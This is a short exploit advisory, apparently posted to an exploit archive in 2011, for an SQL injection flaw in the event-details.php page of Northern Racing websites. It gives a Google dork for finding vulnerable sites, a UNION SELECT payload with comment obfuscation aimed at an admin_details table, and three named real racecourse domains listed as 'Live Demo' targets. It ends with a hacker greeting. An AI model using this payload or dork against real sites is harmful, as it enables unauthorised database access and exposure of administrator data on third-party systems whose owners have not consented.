Northern Racing suffers from a remote SQL injection vulnerability.
b537bbb9d4a91562f89cc78fa5612e6b135909ae054e17b2edda07a006528f79
==========================================================================
# Exploit Title: Northern Racing SQL Injection Vulnerability
# Date: 18.10.2011
# Author: poach3r
# Software Link: https://www.northernracing.co.uk/
# Tested on: Windows XP SP3
# Google Dork: intext:Northern Racing Ltd inurl:event-details.php?detailId=
==========================================================================
# Vulnerable File :
==> event-details.php <==
# Exploit :
https://127.0.0.1/path/events/event-details.php?detailId=[SQL]
https://127.0.0.1/path/events/event-details.php?detailId=-1/**/union/**/Select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/**/admin_details/*
# Live Demo :
https://www.chepstow-racecourse.co.uk/events/event-details.php?detailId=[SQL]
https://www.fontwellpark.co.uk/events/event-details.php?detailId=[SQL]
https://www.sedgefield-racecourse.co.uk/events/event-details.php?detailId=[SQL]
==========================================================================
# GreetZ To : All IRANIAN HackerZ
./End